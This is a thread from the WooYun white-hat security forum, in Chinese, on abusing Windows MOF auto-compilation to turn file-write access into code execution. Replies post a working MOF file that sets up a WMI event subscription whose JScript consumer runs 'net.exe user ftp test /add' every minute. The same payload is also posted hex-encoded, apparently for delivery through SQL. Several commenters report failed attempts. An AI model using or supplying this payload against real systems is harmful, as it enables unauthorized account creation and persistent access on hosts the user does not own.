当前位置:WooYun(白帽子技术社区) >> windows >> windows写权限变成可执行权限的利用

Windows 管理规范 (WMI) 提供了以下三种方法编译到 WMI 存储库的托管对象格式 (MOF) 文件:
方法 1: 运行 MOF 文件指定为命令行参数将 Mofcomp.exe 文件。
Method2: 使用 IMofCompiler 接口和 $ CompileFile 方法。
方法 3: 拖放到 %SystemRoot%\System32\Wbem\MOF 文件夹的 MOF 文件。
Microsoft 建议您到存储库编译 MOF 文件使用前两种方法。也就是运行 Mofcomp.exe 文件,或使用 IMofCompiler::CompileFile 方法。
第三种方法仅为向后兼容性与早期版本的 WMI 提供,并因为此功能可能不会提供在将来的版本后,不应使用。
很多测试的时候会用得到吧,另外感觉应该有其他很多地方得机制可以导致自动启动?
http://support.microsoft.com/kb/245773/zh-cn
-
-
楼主好淫荡。
-
-
-
-
-
-
-
-
-
@鬼哥 删除C:\WINDOWS\system32\wbem\mof\good 添加的mof后,在启动winmgmt 没出现加账户啊!
C:\Documents and Settings\Administrator>net stop winmgmt
Windows Management Instrumentation 服务正在停止.
Windows Management Instrumentation 服务已成功停止。
C:\Documents and Settings\Administrator>net start winmgmt
Windows Management Instrumentation 服务正在启动 .
Windows Management Instrumentation 服务已经启动成功。 -
-
-
-
-
感谢群里的vka0n0
#pragma namespace("\\\\.\\root\\subscription") instance of __EventFilter as $EventFilter {EventNamespace = "Root\\Cimv2";Name = "filtP2";Query = "Select * From __InstanceModificationEvent " "Where TargetInstance Isa \"Win32_LocalTime\" " "And TargetInstance.Second = 5"; QueryLanguage = "WQL";}; instance of ActiveScriptEventConsumer as $Consumer {Name = "consPCSV2";ScriptingEngine = "JScript"; ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user ftp test /add\")";}; instance of __FilterToConsumerBinding {Consumer = $Consumer;Filter = $EventFilter;}; -
感谢暴暴,
0x23707261676D61206E616D65737061636528225C5C5C5C2E5C5C726F6F745C5C737562736372697074696F6E22290D0A696E7374616E6365206F66205F5F4576656E7446696C74657220617320244576656E7446696C7465720D0A7B4576656E744E616D657370616365203D2022526F6F745C5C43696D7632223B4E616D6520203D202266696C745032223B5175657279203D202253656C656374202A2046726F6D205F5F496E7374616E63654D6F64696669636174696F6E4576656E742022200D0A22576865726520546172676574496E7374616E636520497361205C2257696E33325F4C6F63616C54696D655C2220220D0A22416E6420546172676574496E7374616E63652E5365636F6E64203D2035223B0D0A51756572794C616E6775616765203D202257514C223B7D3B0D0A696E7374616E6365206F66204163746976655363726970744576656E74436F6E73756D65722061732024436F6E73756D65720D0A7B4E616D65203D2022636F6E735043535632223B536372697074696E67456E67696E65203D20224A536372697074223B0D0A53637269707454657874203D202276617220575348203D206E657720416374697665584F626A656374285C22575363726970742E5368656C6C5C22295C6E5753482E72756E285C226E65742E6578652075736572206674702074657374202F6164645C2229223B7D3B0D0A696E7374616E6365206F66205F5F46696C746572546F436F6E73756D657242696E64696E670D0A7B436F6E73756D65722020203D2024436F6E73756D65723B46696C746572203D20244576656E7446696C7465723B7D3B -
-
-
-
-
-
-
-
@lion(lp) 应该是把ftp这个用户删除后,又跑了一遍sql。方便演示吧。
我失败了,各种求解释。 -
-
我也是各种失败的。。。不知道为啥了 @hongygxiang
-
@鬼哥 坐等大牛前来指导
-
-
-